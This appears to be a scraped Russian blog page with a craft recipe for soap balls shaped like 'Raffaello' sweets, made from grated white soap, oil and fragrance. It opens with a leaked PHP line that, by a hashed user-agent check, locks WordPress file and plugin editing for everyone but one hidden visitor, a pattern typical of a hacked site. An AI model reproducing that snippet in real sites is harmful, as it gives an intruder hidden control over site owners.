if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Аппетитное мыльце «Рафаэлло» для любимых своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Аппетитное мыльце «Рафаэлло» для любимых своими руками

Мыло ручной работы можно делать не только для домашнего пользования, но и для подарка близкому человеку. Попробуем сделать мыло в виде конфеток «Рафаэлло».

Мыло руч­ной рабо­ты мож­но делать не толь­ко для домаш­не­го поль­зо­ва­ния, но и для подар­ка близ­ко­му чело­ве­ку. Попро­бу­ем сде­лать мыло в виде кон­фе­ток «Рафа­эл­ло». Осо­бен­но оно понра­вит­ся подруге-сладкоежке 🙂

Возь­ми­те 2–3 бру­соч­ка мага­зин­но­го мыла, обя­за­тель­но бело­го (луч­ше все­го дет­ско­го). Натри­те брус­ки на мел­кую тер­ку, а полу­чен­ную мас­су раз­де­ли­те на две части. Пер­вая (поболь­ше) будет мылом, а вто­рая (помень­ше) – «коко­со­вой струж­кой». Первую часть рас­то­пи­те до кон­си­стен­ции каши, добавь­те мас­ла и отдуш­ку. Зачер­пы­вай­те мас­су чай­ной лож­кой и отправ­ляй­те кусо­чек в холо­диль­ник. Через 10–15 минут мож­но достать, ска­тать шарик и обва­лять его в «коко­со­вой струж­ке», а затем сно­ва поме­стить в холодильник.

раф2

раф3

раф4

раф1


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия Евланова

Уже давно увлекаюсь мыловарением. Вот нашла интересный сайт, где можно показать свои творения! Читайте все мои записи!